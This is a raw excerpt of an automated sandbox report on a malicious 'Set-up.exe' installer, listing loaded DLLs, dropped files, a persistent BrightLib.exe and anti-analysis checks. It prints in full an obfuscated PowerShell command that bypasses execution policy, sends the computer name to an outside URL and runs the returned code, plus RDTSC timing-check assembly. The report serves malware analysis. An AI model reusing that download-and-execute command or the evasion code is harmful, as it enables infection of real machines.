              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: explorerframe.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
              Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: wsock32.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: winmm.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: iconcodecservice.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: twinui.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: powrprof.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: pdh.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: umpdc.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: shdocvw.dll
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp Window found: window name: TMainForm
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: Set-up.exe Static file information: File size 74868247 > 1048576
              Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000024.00000002.2524141455.00000000382E6000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2524283597.0000000038640000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000024.00000002.2524141455.00000000382E6000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2524283597.0000000038640000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a
              Source: PU6S498VOPMOZVY2Y7.tmp.8.dr Static PE information: real checksum: 0x33908a should be: 0x33af29
              Source: PU6S498VOPMOZVY2Y7.exe.0.dr Static PE information: real checksum: 0x9307ce should be: 0x8615ed
              Source: PU6S498VOPMOZVY2Y7.tmp.6.dr Static PE information: real checksum: 0x33908a should be: 0x33af29
              Source: PU6S498VOPMOZVY2Y7.exe.0.dr Static PE information: section name: .didata
              Source: PU6S498VOPMOZVY2Y7.tmp.6.dr Static PE information: section name: .didata
              Source: PU6S498VOPMOZVY2Y7.tmp.8.dr Static PE information: section name: .didata
              Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_3_006798E8 push ebp; iretd 0_3_006798E9
              Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_3_00679FF9 pushfd ; ret 0_3_00679FFA
              Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_3_006798D0 push edx; iretd 0_3_006798D1
              Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_02227A5A push ebp; iretd 0_2_02227A60
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0096280F push eax; retf 2_2_00962819
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00962196 push FFFFFFE9h; iretd 2_2_009621A1
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp File created: C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_setup64.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp File created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp File created: C:\Users\user\AppData\Local\Temp\is-2S59A.tmp\_isetup\_isdecmp.dll
              Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe File created: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe File created: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp File created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-1H7IE.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp File created: C:\Users\user\AppData\Local\Temp\is-2S59A.tmp\_isetup\_setup64.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp File created: C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_isdecmp.dll
              Source: C:\Users\user\Desktop\Set-up.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\Set-up.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\find.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\Set-up.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe | API/Special instruction interceptor: Address: 6BB37C44
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe | RDTSC instruction interceptor: First address: 6BB3F3E1 second address: 6BB3F3FD instructions:
                0x00000000 rdtsc
                0x00000002 mov dword ptr [ebp-20h], eax
                0x00000005 mov dword ptr [ebp-1Ch], edx
                0x00000008 lea esi, dword ptr [ebp-38h]
                0x0000000b xor eax, eax
                0x0000000d xor ecx, ecx
                0x0000000f cpuid
                0x00000011 mov dword ptr [esi], eax
                0x00000013 mov dword ptr [esi+04h], ebx
                0x00000016 mov dword ptr [esi+08h], ecx
                0x00000019 mov dword ptr [esi+0Ch], edx
                0x0000001c rdtsc
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe | RDTSC instruction interceptor: First address: 6BB3F3FD second address: 6BB3F3E1 instructions:
                0x00000000 rdtsc
                0x00000002 mov dword ptr [ebp-18h], eax
                0x00000005 mov dword ptr [ebp-14h], edx
                0x00000008 mov eax, dword ptr [ebp-18h]
                0x0000000b sub eax, dword ptr [ebp-20h]
                0x0000000e mov ecx, dword ptr [ebp-14h]
                0x00000011 sbb ecx, dword ptr [ebp-1Ch]
                0x00000014 add eax, dword ptr [ebp-10h]
                0x00000017 adc ecx, dword ptr [ebp-0Ch]
                0x0000001a mov dword ptr [ebp-10h], eax
                0x0000001d mov dword ptr [ebp-0Ch], ecx
                0x00000020 jmp 00007F5954C361B5h
                0x00000022 mov edx, dword ptr [ebp-04h]
                0x00000025 add edx, 01h
                0x00000028 mov dword ptr [ebp-04h], edx
                0x0000002b cmp dword ptr [ebp-04h], 64h
                0x0000002f jnl 00007F5954C36240h
                0x00000031 rdtsc
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2904
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 474
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_setup64.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2S59A.tmp\_isetup\_isdecmp.dll
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2S59A.tmp\_isetup\_setup64.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_isdecmp.dll
              Source: C:\Users\user\Desktop\Set-up.exe TID: 4020 | Thread sleep time: -150000s >= -30000s
